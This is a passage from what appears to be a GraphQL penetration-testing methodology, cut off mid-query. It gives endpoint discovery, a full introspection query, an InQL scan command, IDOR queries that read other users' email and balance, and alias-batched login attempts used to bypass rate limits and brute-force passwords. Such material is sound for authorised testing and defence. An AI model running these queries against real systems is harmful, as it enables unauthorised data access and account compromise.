graphqllisted

# GraphQL Security Testing ## Attack Surface GraphQL endpoints expose a flexible query language that commonly introduces: unauthorized object access via ID manipulation, schema disclosure via introspection, DoS via deeply nested/batched queries, injection via unparameterised arguments, and information disclosure via verbose errors. ## Methodology ### Phase 1 — Discover and fingerprint ``` Common endpoints: /graphql, /api/graphql, /query, /gql, /v1/graphql Test with: { __typename } Check for: GraphiQL IDE exposed in production ``` ### Phase 2 — Introspection (schema extraction) ```graphql query IntrospectionQuery { __schema { types { name kind fields { name type { name kind ofType { name kind } } } } queryType { name } mutationType { name } subscriptionType { name } } } ``` Extract all queries, mutations, types, and field names. Build a complete map of the API surface. ```bash # Automated with InQL or graphql-voyager inql -t http://target/graphql ``` ### Phase 3 — IDOR via ID manipulation ```graphql # Test integer IDs query { user(id: 1) { email, role, balance } } query { user(id: 2) { email, role, balance } } # another user's data # Test UUID enumeration query { order(id: "550e8400-e29b-41d4-a716-446655440000") { total, items } } ``` ### Phase 4 — Batching attacks (rate limit bypass, brute force) ```graphql # Alias batching — send 100 requests in one HTTP call query { a1: login(username: "admin", password: "password1") { token } a2: logi